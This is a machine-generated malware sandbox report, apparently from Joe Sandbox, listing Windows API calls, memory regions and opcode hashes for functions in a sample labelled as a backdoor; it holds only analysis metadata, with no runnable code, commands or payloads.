                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 461713c512444317e2a5e6f87e240bd0c8db7ae1dd39b4818c9275821646ba16
                                                • Instruction ID: af4beab95fa9936aade42eeab0c04a2c7636275d8bf972fd3e9a8c9ca7cbcd01
                                                • Opcode Fuzzy Hash: 461713c512444317e2a5e6f87e240bd0c8db7ae1dd39b4818c9275821646ba16
                                                • Instruction Fuzzy Hash: 8A01F7B661522AFBCB218B689C44A767B9CBF45BA1B200521FA0ED7340D729D920C6E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007FB610: GetEnvironmentStringsW.KERNEL32 ref: 007FB619
                                                  • Part of subcall function 007FB610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007FB63C
                                                  • Part of subcall function 007FB610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007FB662
                                                  • Part of subcall function 007FB610: _free.LIBCMT ref: 007FB675
                                                  • Part of subcall function 007FB610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007FB684
                                                • _free.LIBCMT ref: 007F79FD
                                                • _free.LIBCMT ref: 007F7A04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                • String ID: p`
                                                • API String ID: 400815659-1664568892
                                                • Opcode ID: 4823ccd0addf04a49dcaf3f18ba1bfddf69d87e677e880cb2321af2210cd67e0
                                                • Instruction ID: 5733711445741a055b37747cd1b49964e846b1c75fcb63c6b39193e919212b0e
                                                • Opcode Fuzzy Hash: 4823ccd0addf04a49dcaf3f18ba1bfddf69d87e677e880cb2321af2210cd67e0
                                                • Instruction Fuzzy Hash: 9AE0E55350D54E81DBA5B67A6C0E67F0204ABC1731B110B1AFB20DB3C2CE5C88024096
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,007DCC94,00000001,?,?,?,00000000,007E4ECD,?,?,?), ref: 007D9F4C
                                                • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,007E4ECD,?,?,?,?,?,007E4972,?), ref: 007D9F8E
                                                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,007DCC94,00000001,?,?), ref: 007D9FB8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: FileWrite$Handle
                                                • String ID:
                                                • API String ID: 4209713984-0
                                                • Opcode ID: b742189fdc1e694734c07464e3946058c7c7d388f92efa123d296f7a45351084
                                                • Instruction ID: ad1e375dcdb436fe0457dd8271f8a896edba74f9ab587f4aa498106fb0209be5
                                                • Opcode Fuzzy Hash: b742189fdc1e694734c07464e3946058c7c7d388f92efa123d296f7a45351084
                                                • Instruction Fuzzy Hash: 75310271608305ABDF109F24D948B6ABBB8FB40710F044A5AFA85DB381C778D948CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA22E
                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA261
                                                • GetLastError.KERNEL32(?,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA27E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CreateDirectory$ErrorLast
                                                • String ID:
                                                • API String ID: 2485089472-0
                                                • Opcode ID: 5fd9ee4aaecc854784e4e5a270340049d6273d83d967eb1603723c79d7ed57e1
                                                • Instruction ID: 6df61aff43e535a5f05f4d9f723bf0b96f886077af208283dc7c5dc16ae70a32
                                                • Opcode Fuzzy Hash: 5fd9ee4aaecc854784e4e5a270340049d6273d83d967eb1603723c79d7ed57e1
                                                • Instruction Fuzzy Hash: F401D231581618B6DB32ABB64C09FEE337CBF4A741F040457F840D5251CB6EEA4086B3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 007FB019
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Info
                                                • String ID:
                                                • API String ID: 1807457897-3916222277
                                                • Opcode ID: 5926b0c0994d8a726316859fc756aba62f826a30ba56096e2bea2ccdb5bcc2b9
                                                • Instruction ID: 6a76ad0105e9acdcba8d65c60cc0fc501cd89bb6ab461c110d36e957b4e5a86c
                                                • Opcode Fuzzy Hash: 5926b0c0994d8a726316859fc756aba62f826a30ba56096e2bea2ccdb5bcc2b9
                                                • Instruction Fuzzy Hash: D8410A7050434C9ADF218E64CC94BF7BBAEEB45304F2404EDE69A87242E7399E45DF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 007FA79D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: String
                                                • String ID: LCMapStringEx
                                                • API String ID: 2568140703-3893581201
                                                • Opcode ID: 726c6422d1a3fc4f52ae972477917c4b186a0da6a9f89a02840860932217ca47
                                                • Instruction ID: 715ce19f9d0709159799cf4d9e225d568e96051ec86962175e53238416e4cb08
                                                • Opcode Fuzzy Hash: 726c6422d1a3fc4f52ae972477917c4b186a0da6a9f89a02840860932217ca47
                                                • Instruction Fuzzy Hash: B601137260020CBBCF126FA4DC05DAE3F66FF08750F054114FE2866260CA3A9A31EBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,007F9D2F), ref: 007FA715
                                                Strings
                                                • InitializeCriticalSectionEx, xrefs: 007FA6E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpin
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 2593887523-3084827643
                                                • Opcode ID: 5b181d940242ae6a5140f9355c7c44bfd232f0124d6f5f7a077b80c8d4c03000
                                                • Instruction ID: 815fbaed747241712213ac70f771041d86c2a83237b11ca3fcf02542361f70a5
                                                • Opcode Fuzzy Hash: 5b181d940242ae6a5140f9355c7c44bfd232f0124d6f5f7a077b80c8d4c03000
                                                • Instruction Fuzzy Hash: B0F0BE71A4521CBBCB116F64DC09CAE7F65FF18720B408064FD295A3A0DA765A10EBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Alloc
                                                • String ID: FlsAlloc
                                                • API String ID: 2773662609-671089009
                                                • Opcode ID: 27bebec22ef556cfbb25b73e8a9a592e00632e6877c05cf0bbeb5961ff3858f6
                                                • Instruction ID: 5939405927326e38afb5691d40f82675eb530c38f730e21af8fcf6e4c407e683
                                                • Opcode Fuzzy Hash: 27bebec22ef556cfbb25b73e8a9a592e00632e6877c05cf0bbeb5961ff3858f6
                                                • Instruction Fuzzy Hash: E6E055B0B4522CBBD3146B649C068BEBB54EF28711B410118FC1997390DD791E0096E6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • try_get_function.LIBVCRUNTIME ref: 007F32AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: FlsAlloc
                                                • API String ID: 2742660187-671089009
                                                • Opcode ID: 8761c11851196a73141a80808de64b7e2ba872247053d3b263753514f7ffa23e
                                                • Instruction ID: c25f51442a3f4eaf0e5ff3ab02a032a4bacde5dc32be137d6c9be722671f93f7
                                                • Opcode Fuzzy Hash: 8761c11851196a73141a80808de64b7e2ba872247053d3b263753514f7ffa23e
                                                • Instruction Fuzzy Hash: FCD0C221781A39AAC55032856C029BB7B44EB01BB2B450252FF289A382A46A491045F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EE20B
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID: 3To
                                                • API String ID: 1269201914-245939750
                                                • Opcode ID: 57c5623bee081f4b1880f2f640c033078fc296638c2fae346c6fe8ba4f004c17
                                                • Instruction ID: cd5cc96f415ee0e808f4d3890acb1cd7ce36d9d4d278bbcfbe2d1a2fea694a90
                                                • Opcode Fuzzy Hash: 57c5623bee081f4b1880f2f640c033078fc296638c2fae346c6fe8ba4f004c17
                                                • Instruction Fuzzy Hash: ABB012A126F441BC320C5143BD1AC36031CE4C4B50330C41AB325D41C095889D0D4032
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007FAF1B: GetOEMCP.KERNEL32(00000000,?,?,007FB1A5,?), ref: 007FAF46
                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,007FB1EA,?,00000000), ref: 007FB3C4
                                                • GetCPInfo.KERNEL32(00000000,007FB1EA,?,?,?,007FB1EA,?,00000000), ref: 007FB3D7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CodeInfoPageValid
                                                • String ID:
                                                • API String ID: 546120528-0
                                                • Opcode ID: d803e7d98fcfca98c033b67878b985d70000b4dd06357e7136adbfc32b693413
                                                • Instruction ID: a6bba8c6207509d416ae257a12ec8bb3a27c7f2f6e4d8253dea99d4abf8faaad
                                                • Opcode Fuzzy Hash: d803e7d98fcfca98c033b67878b985d70000b4dd06357e7136adbfc32b693413
                                                • Instruction Fuzzy Hash: B55140B0A002899EDB20CF31C8856BABBE5EF44310F18846ED2868B353D33D9946CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D1385
                                                  • Part of subcall function 007D6057: __EH_prolog.LIBCMT ref: 007D605C
                                                  • Part of subcall function 007DC827: __EH_prolog.LIBCMT ref: 007DC82C
                                                  • Part of subcall function 007DC827: new.LIBCMT ref: 007DC86F
                                                  • Part of subcall function 007DC827: new.LIBCMT ref: 007DC893
                                                • new.LIBCMT ref: 007D13FE
                                                  • Part of subcall function 007DB07D: __EH_prolog.LIBCMT ref: 007DB082
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: e7977358b1eec29a610ca3ecdd0fec0450f832abc08cf4b5bc220cef085cf9c3
                                                • Instruction ID: 6f33cdd7b969b0bfb0017989d4411af0190c7222267ad6a689dbbf00d5b4d345
                                                • Opcode Fuzzy Hash: e7977358b1eec29a610ca3ecdd0fec0450f832abc08cf4b5bc220cef085cf9c3
                                                • Instruction Fuzzy Hash: 384116B0905B40DED724DF7984899E6FAF5FF18300F504A2ED6EE83282DB366554CB11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D1385
                                                  • Part of subcall function 007D6057: __EH_prolog.LIBCMT ref: 007D605C
                                                  • Part of subcall function 007DC827: __EH_prolog.LIBCMT ref: 007DC82C
                                                  • Part of subcall function 007DC827: new.LIBCMT ref: 007DC86F
                                                  • Part of subcall function 007DC827: new.LIBCMT ref: 007DC893
                                                • new.LIBCMT ref: 007D13FE
                                                  • Part of subcall function 007DB07D: __EH_prolog.LIBCMT ref: 007DB082
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: dec23c1ece902c723340c7efb16c4e9d5089c2f77b2001fed0852d1faaa2db55
                                                • Instruction ID: f8d267cd5d77e5b89b9439b92fb6138c1fb5de3267d8e2d05ab07f3f070665dd
                                                • Opcode Fuzzy Hash: dec23c1ece902c723340c7efb16c4e9d5089c2f77b2001fed0852d1faaa2db55
                                                • Instruction Fuzzy Hash: EF4106B0805B40DEE724DF7984899E7FAE5FF18310F504A2ED2EE83282DB366554CB15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007F8FA5: GetLastError.KERNEL32(?,00810EE8,007F3E14,00810EE8,?,?,007F3713,00000050,?,00810EE8,00000200), ref: 007F8FA9
                                                  • Part of subcall function 007F8FA5: _free.LIBCMT ref: 007F8FDC
                                                  • Part of subcall function 007F8FA5: SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F901D
                                                  • Part of subcall function 007F8FA5: _abort.LIBCMT ref: 007F9023
                                                  • Part of subcall function 007FB2AE: _abort.LIBCMT ref: 007FB2E0
                                                  • Part of subcall function 007FB2AE: _free.LIBCMT ref: 007FB314
                                                  • Part of subcall function 007FAF1B: GetOEMCP.KERNEL32(00000000,?,?,007FB1A5,?), ref: 007FAF46
                                                • _free.LIBCMT ref: 007FB200
                                                • _free.LIBCMT ref: 007FB236
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$ErrorLast_abort
                                                • String ID:
                                                • API String ID: 2991157371-0
                                                • Opcode ID: aff3a4c4409b16c0bff8c27e233a9c19d2f45d80d7603bf48fb2aef3b2becb16
                                                • Instruction ID: b33b6434c2a7a9b86840055b15e309201e92f561fbc0821c7cba5c323795c14d
                                                • Opcode Fuzzy Hash: aff3a4c4409b16c0bff8c27e233a9c19d2f45d80d7603bf48fb2aef3b2becb16
                                                • Instruction Fuzzy Hash: D631C13190420CEFDB10EFA9C845A7E77E5FF41320F254099EA249B391DB799D41CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,007D9EDC,?,?,007D7867), ref: 007D97A6
                                                • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,007D9EDC,?,?,007D7867), ref: 007D97DB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
